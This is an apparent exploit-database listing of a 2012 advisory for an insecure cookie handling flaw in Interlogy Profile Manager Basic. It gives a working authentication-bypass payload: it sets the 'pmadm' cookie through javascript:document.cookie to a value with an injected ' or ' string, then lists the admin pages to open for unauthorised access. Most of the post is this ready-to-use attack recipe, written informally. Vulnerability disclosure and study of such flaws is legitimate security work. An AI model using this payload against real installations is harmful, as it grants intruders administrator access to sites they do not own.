Interlogy Profile Manager Basic Insecure Cookie Handling

🗓️ 04 Mar 2012 00:00:00Reported by zer03sType

packetstorm🔗 packetstormsecurity.com👁 17 Views

interlogy Profile Manager Basic Insecure Cookie Handling Vulnerability discovered by zer03s on 03/05/2012. Allows unauthorized login using manipulated cookies

`[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling  
Vulnerability  
[~]  
[~] ----------------------------------------------------------  
[~] Discovered By: zer03s  
[~]  
[~] Date: 03/05/2012  
[~]  
[~] Home: zer03s.blog.com  
[~]  
[~] -----------------------------------------------------------  
  
desc:  
  
normal login for cookie  
  
pmadm=dGVzdA;  
  
if ý do this:  
  
pmadm=dGVzd(write any thing);  
  
example:  
  
pmadm=dGVzdz;  
  
or  
  
pmadm=dGVzd123231212313;  
  
not login  
  
if ý do wthis:  
  
pmadm=dGVzd ' or ';  
  
boom this loggin :D  
  
exp:  
  
javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";  
  
after you go here:  
  
http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp  
  
or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: all member blackc0de  
[~]----------------------------------------------------------------------  
`

04 Mar 2012 00:00Current

0.3Low risk

Vulners AI Score0.3